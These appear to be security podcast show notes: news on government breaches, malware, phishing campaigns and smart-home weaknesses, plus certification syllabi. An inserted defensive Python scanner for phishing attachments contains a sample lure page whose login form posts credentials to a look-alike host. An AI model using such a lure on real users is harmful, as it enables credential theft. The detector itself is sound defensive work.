
In Security Decoded this week we cover the news and there is a lot of it:

* Hacker announces the Zombie Apocalypse is here over the Emergency Broadcast System
* Facebook had a zero-day
* Multiple US government agencies were hacked
* Zeus is showing up in Japan
* Your heating and elevator controls could be easily hacked
* A new RAT called Frutas
* More Java, Flash, PDF and Microsoft vulnerabilities announced
* The PCI Special Interest Group releases guidance around cloud computing
* And much more news

And we talk in detail about security certifications.

Hacked Emergency broadcast announces Zombie Apocalypse is here

Viewers in Montana who were no doubt already on the edge of their seats waiting for the results of "teen cheaters take lie detectors" were suddenly confronted with a bigger calamity on Monday. The CW station of KRTV was interrupted by an emergency alert for a zombie apocalypse. Viewers were told that "the bodies of the dead are rising from their graves and attacking the living" in several Montana counties. KRTV confirmed someone had hacked into their emergency alert system and "there is no emergency."

Fed says internal site breached by hackers, no critical functions affected - Anonymous attack on US Government

Energy Department networks hit by Sophisticated Cyber Attack

There are indications the attackers had other motives, possibly including plans to gain future access to classified and other sensitive information.

No classified information was compromised in the cyber attack.

The source or identity of the cyber attacker is not known, according to U.S. officials and outside security analysts. However, Chinese hackers are likely suspects because the department is known to be a major target of China for both secrets and technology.

The relative sophistication of the cyber attack is an indication of nation-state involvement.

A total of 14 computer servers and 20 workstations at the headquarters were penetrated during the attack.

At least 20 internal documents, including confidential items, may have been stolen from the Foreign Ministry via an official computer in an apparent cyber-attack, it has been learned.

The ministry said Tuesday it had examined only one computer so far, and that it would examine other computers to determine whether they, too, were infected with malware.

The cyber-attack followed the recent revelation at the Agriculture, Forestry and Fisheries Ministry that more than 3,000 pieces of information, including highly confidential documents, are suspected to have been stolen via unauthorized access to its computers.

According to the Foreign Ministry, it was notified by the National Information Security Center (NISC) on Jan. 28 that a computer at the ministry had possibly been the victim of unauthorized access. The ministry conducted an investigation and verified one of its computers had unauthorized communications with an external server.

The documents believed stolen include conference materials that could be considered class-2 information in terms of confidentiality according to the government's standard classification.

Nokia Taiwan web sites defaced

Hackers of the Turkish Ajan group have breached Nokia Taiwan's official website (nokia.com.tw). They defaced four subdomains and leaked files that, according to the hackers, contain around 100,000 records, including user details.

The affected subdomains are member.nokia.com.tw, event.nokia.com.tw, fun.nokia.com.tw, and swipe.nokia.com.tw.

It's difficult to determine precisely how many users are affected by the breach. However, the Nokia610_Users file contains the names, email addresses, phone numbers, and IMEIs of 440 customers.

One of the larger files, NKA073_User, contains the details of close to 20,000 users. The names, mobile phone numbers and email addresses of over 25,000 customers are stored in another file named Event_N97_User.

Python and Debian wikis hacked

An analysis of the incident revealed that an exploit had been planted on our servers possibly as early as July 25, 2012, which allowed arbitrary execution of code under the user running the MoinMoin wiki.

It is likely that the password information was downloaded from the server in the course of the security breach, so we recommend changing your passwords immediately if you have used the same password for other services as well.

An exploit was used on an engineer's laptop (the maker of the undisclosed software was then made aware of the zero-day Facebook used in its test).

The test alarm was not sounded until the response team was already underway.

Everything was a test of how the team handled a security incident.

Use this quote; it is a good reference to Episode 1 of our predictions, where we state that cybersecurity is falling behind and needs to close the gap: "Internet security is so flawed," Facebook Chief Security Officer Joe Sullivan told Ars. "I hate to say it, but it seems everyone is in this constant losing battle if you read the headlines. We don't want to be part of those bad headlines."

BKDR_Zaccess - known as bootkit malware; it also has the ability to download other malware or push fake applications like FakeAV.

TROJ_Ransom - known as ransomware, it typically locks systems until users are forced to pay a sum of money. This malware is rapidly active in the wild and evolving at a fast pace. We have seen this in the form of "FBI" notifications of illegal web activity.

Whitehole is still in beta testing, but its developers are already selling the kit for 200-1800 USD.

Yahoo using old Java

At a time when Java has come under the microscope for its multiple vulnerabilities, and companies like Apple and Mozilla urge users to update to the most current version of Java, Yahoo is still offering an application based on a 2008 version of Java.

SiteBuilder is a free tool designed to make building a website as simple as point and click. SiteBuilder requires Java to function.

Yahoo bundles this application with Java 6 Update 7. It is not clear whether this is an oversight or whether SiteBuilder cannot function with recent versions of Java.

The latest Java 6 is release 39.

One final note about SiteBuilder: building your site with this tool may not only be hazardous to the security of your PC, it may also make it harder for your site to get the recognition it deserves. A bit of searching on this tool turned up some less than flattering results suggesting that sites built with SiteBuilder do not support an important type of website search optimization called "canonicalization."

Money Transfer Spam Campaign with HTML Attachment

Phishers love to arouse curiosity and/or fear in the user's mind, and this stimulus can compel people to set aside all caution as well as any safety measures they might have in place.

Users are advised to confirm a pending transaction with their bank and are also told that a copy of a bank slip is attached.

If the HTML attachment is opened, users are shown an image of a payment order. It is interesting to note that this image is very faint and very difficult to read. Using the HTML meta tag HTTP-EQUIV "REFRESH", this image disappears after four seconds. Displaying the receipt for such a short period is an attempt to arouse enough interest in the user that they will venture further into the trap.

The page refreshes after four seconds and a popup appears that states that the user has been signed out of their email account and needs to sign in again to view the bank slip.

On clicking the only button offered, users are shown a website that resembles a well-known bank login page. If users input their bank credentials or their email address on this page, their information is sent to the scammers and may be used for nefarious purposes.
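As an added example (not from the show notes or the original report), the scanner below triages an HTML e-mail attachment for the lure features just described: a meta refresh that swaps the page after a few seconds, a form with a password field, and a form action pointing at a host other than the sender's own. The sample attachment, the host name bank.example and the look-alike host examp1e-bank.invalid are all constructed for this example.

```python
"""Static triage of an HTML e-mail attachment for the phishing lure pattern above.

Added example, not code from the original page. Flags three features of the
money-transfer attachment: a <meta http-equiv="refresh"> that replaces the page
after a delay, a login form containing a password field, and a form action
posting to a host other than the one the mail claims to come from.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachment: a faint receipt image, a meta refresh that
# replaces it after four seconds, and a "sign in again" form posting to a
# look-alike host. None of these values come from a real campaign.
SAMPLE_ATTACHMENT = """
<html><head>
<meta http-equiv="refresh" content="4;url=#signin">
</head><body>
<img src="receipt.png" style="opacity:0.1">
<div id="signin">You have been signed out. Sign in again to view the bank slip.</div>
<form method="post" action="http://examp1e-bank.invalid/login.php">
  <input name="user"><input type="password" name="pass">
</form>
</body></html>
"""


class LureScanner(HTMLParser):
    """Collects meta-refresh directives, form actions and password inputs."""

    def __init__(self):
        super().__init__()
        self.refreshes = []      # (delay_seconds, target) tuples
        self.form_actions = []   # raw action attribute values
        self.password_fields = 0

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases attribute names; values may be None.
        a = {k: (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.refreshes.append(parse_refresh(a.get("content", "")))
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_fields += 1


def parse_refresh(content):
    """Split a refresh content value such as '4;url=...' into (delay, target)."""
    delay_part, _, rest = content.partition(";")
    try:
        delay = float(delay_part.strip())
    except ValueError:
        delay = 0.0
    target = rest.strip()
    if target.lower().startswith("url="):
        target = target[4:].strip().strip("'\"")
    return delay, target


def scan_attachment(html, expected_host):
    """Return a list of findings; an empty list means no lure features were seen."""
    scanner = LureScanner()
    scanner.feed(html)
    findings = []
    for delay, target in scanner.refreshes:
        findings.append(f"meta refresh after {delay:g}s to {target or '(same page)'}")
    if scanner.password_fields:
        findings.append(f"{scanner.password_fields} password field(s) in attachment")
    for action in scanner.form_actions:
        host = urlparse(action).hostname
        if host and host.lower() != expected_host.lower():
            findings.append(f"form posts credentials to foreign host {host}")
    return findings


if __name__ == "__main__":
    # expected_host is the domain the message claims to be from (constructed).
    for finding in scan_attachment(SAMPLE_ATTACHMENT, "bank.example"):
        print("FLAG:", finding)
```

A mail gateway would run this over every text/html attachment and quarantine or tag messages that combine a timed refresh with a credential form; any one feature alone is common on legitimate pages, so the combination is what makes the verdict useful.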

Phishing: The Easy Way to Compromise Twitter Accounts

If the link is clicked, the browser is directed to a page that informs the user that they need to sign in to their account to proceed. The page looks like it belongs to Twitter, but it is actually a phishing page hosted on a server prepared by the attacker.

No matter what is entered into the login fields, correct or incorrect credentials, the user is returned to what appears to be their session.

Looks just like Twitter

However, another fake page informs the user that the page they were attempting to visit does not exist. The page then redirects back to the legitimate Twitter page and the user is unaware of anything malicious having taken place.

In the last two years, more than eight million computers have been attacked by Bamital.

Affects Search

Microsoft and Symantec teaming up

Microsoft convinced a judge at the U.S. District Court for the Eastern District of Virginia to give it control over the infrastructure that Bamital used to coordinate the search hijacking activities of host PCs.

Public cloud environments are usually designed to allow access from anywhere on the Internet.

Perimeter boundaries between client environments can be fluid.

Clients may have limited or no oversight or control over cardholder data storage. Organizations might not know where cardholder data is physically stored, or the location(s) can regularly change. For redundancy or high availability reasons, data could be stored in multiple locations at any given time.

It can be challenging to verify who has access to cardholder data processed, transmitted, or stored in the cloud environment.

Dark Side of Home Automation

X10. Because X10 devices use 4-bit ID numbers, they are vulnerable to brute-force attacks. Furthermore, because they can be turned off with just one command, a thief can turn off an X10-based alarm and infiltrate a victim's house.

Z-Wave. By using tools readily available on the Internet, an attacker can sniff all traffic that flows in the WPAN. With this information, an attacker can monitor a user's day-to-day activities and gain information on the kind of devices used at home and how they are controlled. More tech-savvy thieves can even execute arbitrary commands via the WPAN.

ZigBee. Though ZigBee-based devices have more secure communication, problems still exist in the gateway between the WPAN and an IP network. An attacker can bypass ZigBee authentication due to a user's weak password or misconfiguration, allowing him to access devices like security cameras. With this, an attacker can monitor the user's daily activities and change the gateway configuration to connect to a fake Domain Name System (DNS) or proxy server, which may lead to data theft.

Information Security Governance and Risk Management – the identification of an organization’s information assets and the development, documentation and implementation of policies, standards, procedures and guidelines.

Security governance and policy

Information classification/ownership

Contractual agreements and procurement processes

Risk management concepts

Personnel security

Security education, training and awareness

Certification and accreditation

Software Development Security – refers to the controls that are included within systems and applications software and the steps used in their development.

Systems development life cycle (SDLC)

Application environment and security controls

Effectiveness of application security

Cryptography – the principles, means and methods of disguising information to ensure its integrity, confidentiality and authenticity.

Encryption concepts

Digital signatures

Cryptanalytic attacks

Public Key Infrastructure (PKI)

Information hiding alternatives

Security Architecture and Design – contains the concepts, principles, structures and standards used to design, implement, monitor, and secure operating systems, equipment, networks, applications, and those controls used to enforce various levels of confidentiality, integrity and availability.

Operations Security – used to identify the controls over hardware, media and the operators with access privileges to any of these resources.

Resource protection

Incident response

Attack prevention and response

Patch and vulnerability management

Business Continuity and Disaster Recovery Planning – addresses the preservation of the business in the face of major disruptions to normal business operations.

Business impact analysis

Recovery strategy

Disaster recovery process

Provide training

Legal, Regulations, Investigations and Compliance – addresses computer crime laws and regulations; the investigative measures and techniques which can be used to determine if a crime has been committed and methods to gather evidence.

Legal issues

Investigations

Forensic procedures

Compliance requirements/procedures

Physical (Environmental) Security – addresses the threats, vulnerabilities and countermeasures that can be utilized to physically protect an enterprise’s resources and sensitive information.

Site/facility design considerations

Perimeter security

Internal security

Facilities security

Security+ - CompTIA

Network Security (21% of exam)

Compliance and Operational Security (18%)

Threats and Vulnerabilities (21%)

Application, Data and Host Security (16%)

Access Control and Identity Management (13%)

Cryptography (11%)

Certified Information Security Manager (CISM) - ISACA

Information Security Governance

Information Security Steering Group

Legal and regulatory issues

Information Security Process Improvement

Recovery Time Objectives

Security Metrics

Due Diligence

Security Baselines

Disaster recovery

Collecting and presenting evidence

Cost Benefit Analysis

Privacy and Tax laws

Certified Information Security Auditor (CISA) - ISACA

ISACA IS Auditing Standards, Guidelines and Procedures and Code of Professional Ethics

Control objectives and controls related to IS

COBIT controls

Procedures used to store, retrieve, transport, and dispose of confidential information assets